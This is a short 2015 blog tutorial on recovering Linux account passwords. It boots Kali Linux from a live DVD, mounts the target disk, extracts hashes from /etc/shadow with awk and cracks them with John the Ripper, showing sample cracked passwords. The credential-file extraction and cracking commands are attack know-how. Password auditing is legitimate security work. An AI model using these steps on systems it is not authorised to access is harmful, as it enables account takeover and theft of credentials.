Wednesday, 6 May 2015

Crack Linux Passwords using Kali Linux

In this tutorial, we will use 'John the Ripper' in Kali Linux to crack Linux passwords stored in the file '/etc/shadow'

For this tutorial, you need
a) Kali Linux LiveDVD
b) A linux machine

Perform the following steps:

1) Boot the machine using Kali Linux LiveDVD

2) Open the terminal window, and view the list of partitions on disk
root@kali:~# lsblk

3) Mount the Linux root partition
root@kali:~# mount /dev/vg_meru/root /mnt
root@kali:~# cd /mnt

4) Create a text file containing username and password hash in the following format.

[root@meru ~]# awk -F: '$2 ~ /^\$/ {print $1":"$2}' /etc/shadow > password.lst

[root@meru ~]# cat password.lst

5) Crack the password hashes using John the Ripper
root@kali:~# john password.lst
Created directory: /root/.john
Loaded 2 password hashes with 2 different salts (sha512crypt [64/64])
welcome          (katrina)
admin            (shabbir)
guesses: 2  time: 0:00:00:16 DONE (Wed May  6 10:57:13 2015)  c/s: 278  trying: Winnie - allstate
Use the "--show" option to display all of the cracked passwords reliably

6) View the list of username, password.
root@kali:~# john --show password.lst

1 comment:

  1. how to create a text file containing username and password hash in the following format